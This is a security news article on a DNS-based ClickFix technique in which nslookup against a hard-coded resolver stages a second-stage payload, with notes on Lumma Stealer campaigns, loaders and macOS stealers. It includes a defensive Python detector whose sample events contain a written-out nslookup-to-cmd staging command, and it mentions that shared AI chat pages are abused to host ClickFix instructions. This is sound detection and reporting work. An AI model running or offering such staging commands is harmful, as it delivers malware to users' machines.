Microsoft Warns of DNS-Based ClickFix Attack via Nslookup for Malware Staging and Deployment


New Malware Staging Tactic Abuses DNS for Stealthy Payload Delivery

A recently discovered variation of the ClickFix social engineering tactic has been found to leverage the Domain Name System (DNS) for malware staging, allowing attackers to bypass traditional security controls. This DNS-based approach enables threat actors to establish a lightweight staging channel, reducing their reliance on web requests and blending malicious activity into normal network traffic.

According to Microsoft’s Threat Intelligence team, the attack begins with a command executed via the Windows Run dialog, which runs nslookup against a hard-coded external DNS server. The output is then filtered to keep only the `Name:` line of the DNS response, and the content extracted from that line is executed as the second-stage payload.
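The staging chain described above leaves a recognisable footprint in process-creation telemetry: an nslookup invocation that names an explicit resolver, a filter that keeps only the `Name:` line, and a pipe or command-substitution loop that hands the result to a command interpreter, typically launched from the Run dialog (a child of explorer.exe). The following Python triage script is an added example, not code from Microsoft or the article; the JSON event schema, the sample events and the `APPROVED_RESOLVERS` set are constructed assumptions standing in for a real Sysmon or EDR feed and the organisation's sanctioned DNS servers.

```python
"""Defensive triage of Windows process-creation events for the nslookup-based
ClickFix staging pattern: nslookup against a hard-coded resolver, output
filtered for the 'Name:' line, result handed to a command interpreter.
The event schema and every sample event below are constructed for this
example (simplified Sysmon-style JSON lines); they are not from any product."""
import json
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumption: the organisation's sanctioned recursive resolvers (placeholder
# documentation-range address). Any other explicit resolver counts as unapproved.
APPROVED_RESOLVERS = {"192.0.2.10"}

NSLOOKUP = re.compile(r"\bnslookup(?:\.exe)?\b", re.I)
# nslookup [-opt ...] <name> <server>: capture an explicit IPv4 resolver argument.
EXPLICIT_RESOLVER = re.compile(
    r"\bnslookup(?:\.exe)?\b(?:\s+-\S+)*\s+\S+\s+(\d{1,3}(?:\.\d{1,3}){3})\b", re.I)
# Output filtered down to the 'Name:' response line (findstr / find / Select-String).
NAME_FILTER = re.compile(r"\b(?:findstr|find|select-string|sls)\b[^|]*\bName:", re.I)
# Filtered output piped into an interpreter, or wrapped in a for /f substitution loop.
EXEC_SINK = re.compile(r"\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b|\bfor\s+/f\b", re.I)
# The Run dialog launches its command as a child of explorer.exe.
RUN_DIALOG_PARENT = re.compile(r"\\explorer\.exe$", re.I)

WEIGHTS = {"nslookup": 1, "unapproved_resolver": 2, "name_filter": 2,
           "exec_sink": 4, "run_dialog_parent": 1}


@dataclass
class Finding:
    pid: int
    severity: str
    score: int
    indicators: List[str]


def indicators_for(event: dict) -> List[str]:
    """Return the names of the indicators present in one process-creation event."""
    cmd = event.get("cmdline", "")
    hits: List[str] = []
    if not NSLOOKUP.search(cmd):
        return hits                      # the whole pattern hinges on nslookup
    hits.append("nslookup")
    m = EXPLICIT_RESOLVER.search(cmd)
    if m and m.group(1) not in APPROVED_RESOLVERS:
        hits.append("unapproved_resolver")
    if NAME_FILTER.search(cmd):
        hits.append("name_filter")
    if EXEC_SINK.search(cmd):
        hits.append("exec_sink")
    if RUN_DIALOG_PARENT.search(event.get("parent_image", "")):
        hits.append("run_dialog_parent")
    return hits


def classify(event: dict) -> Optional[Finding]:
    """Score one event; a plain nslookup from an admin shell scores too low to report."""
    hits = indicators_for(event)
    score = sum(WEIGHTS[h] for h in hits)
    if score >= 8:
        severity = "high"
    elif score >= 4:
        severity = "medium"
    else:
        return None
    return Finding(event["pid"], severity, score, hits)


def scan(lines) -> List[Finding]:
    """Run classify() over JSON-lines events, keeping only reportable findings."""
    findings = []
    for line in lines:
        finding = classify(json.loads(line))
        if finding:
            findings.append(finding)
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Benign: an admin checks a mail record from an interactive shell.
    json.dumps({"pid": 3001, "image": r"C:\Windows\System32\nslookup.exe",
                "parent_image": r"C:\Windows\System32\cmd.exe",
                "cmdline": "nslookup -type=mx example.com"}),
    # Benign: explicit but approved resolver, no filtering, no execution sink.
    json.dumps({"pid": 3002, "image": r"C:\Windows\System32\nslookup.exe",
                "parent_image": r"C:\Windows\System32\cmd.exe",
                "cmdline": "nslookup host.example.com 192.0.2.10"}),
    # Suspicious: Run-dialog launch, unapproved resolver, 'Name:' filter, piped to cmd.
    json.dumps({"pid": 4102, "image": r"C:\Windows\System32\cmd.exe",
                "parent_image": r"C:\Windows\explorer.exe",
                "cmdline": "cmd.exe /c nslookup stage.example 203.0.113.53 | findstr Name: | cmd"}),
    # Partial match: same launch and filter but no execution sink (medium only).
    json.dumps({"pid": 4103, "image": r"C:\Windows\System32\cmd.exe",
                "parent_image": r"C:\Windows\explorer.exe",
                "cmdline": "cmd.exe /c nslookup t.example 203.0.113.53 | findstr Name:"}),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid={f.pid} severity={f.severity} score={f.score} indicators={f.indicators}")
```

The weights deliberately make the execution sink the decisive indicator: an nslookup with an explicit resolver is routine for administrators, so resolver choice and Run-dialog parentage only raise the score, while filtering for `Name:` and feeding the result to an interpreter together are what distinguish staging from troubleshooting. In a real deployment, `APPROVED_RESOLVERS` should be populated from the organisation's DHCP or GPO DNS settings, and the same logic can be expressed as a Sigma or EDR rule over the `CommandLine` and `ParentImage` fields.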

This tactic has been linked to various malware campaigns, including those distributing the Lumma Stealer, which has been observed in India, France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada. The stealer, associated with the GrayBravo threat actor, incorporates checks for virtualization software and specific security programs before decrypting and launching the malware in memory.

The use of DNS as a staging channel is a significant development in the evolution of ClickFix, which has traditionally relied on phishing, malvertising, or drive-by downloads to infect victims. By abusing procedural trust rather than technical vulnerabilities, attackers can trick unsuspecting users into executing arbitrary code on their own systems.

CastleLoader and RenEngine Loader Used in Lumma Stealer Campaigns

Two loaders, CastleLoader and RenEngine Loader, have been identified as key components in Lumma Stealer campaigns. CastleLoader, in particular, has been observed in various attacks, including those using fake CAPTCHA verification pages on compromised websites to trick users into executing PowerShell commands.

RenEngine Loader, on the other hand, has been used in campaigns targeting users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France. The loader in turn delivers a secondary loader named Hijack Loader, which then deploys Lumma Stealer.

macOS Targeted by Infostealers and Sophisticated Tools

A recent analysis has found that threat actors are increasingly targeting Apple macOS with infostealers and sophisticated tools. Nearly every macOS stealer prioritizes cryptocurrency theft, reflecting the economic reality that cryptocurrency users disproportionately use Macs and often hold significant value in software wallets.

The “Macs don’t get viruses” assumption is no longer valid, and organizations with Mac users need detection capabilities for macOS-specific tactics, techniques, and procedures (TTPs). These include unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.

ClickFix Variants and Associated Campaigns

  • A macOS campaign using phishing and malvertising ploys to deliver Odyssey Stealer, a rebrand of Poseidon Stealer.
  • A ClickFix attack chain targeting Windows systems that uses fake CAPTCHA verification pages on legitimate-but-compromised websites to trick users into executing PowerShell commands that deploy the StealC information stealer.
  • A phishing campaign using a malicious SVG file contained within a password-protected ZIP archive to instruct the victim to run a PowerShell command using ClickFix, ultimately resulting in the deployment of an open-source .NET infostealer called Stealerium.
  • A campaign exploiting the public sharing feature of generative artificial intelligence (AI) services like Anthropic Claude to stage malicious ClickFix instructions on how to perform various tasks on macOS.
  • A campaign directing users searching for “macOS cli disk space analyzer” to a fake Medium article impersonating Apple’s Support Team to deceive them into running ClickFix instructions that deliver next-stage stealer payloads from an external server.
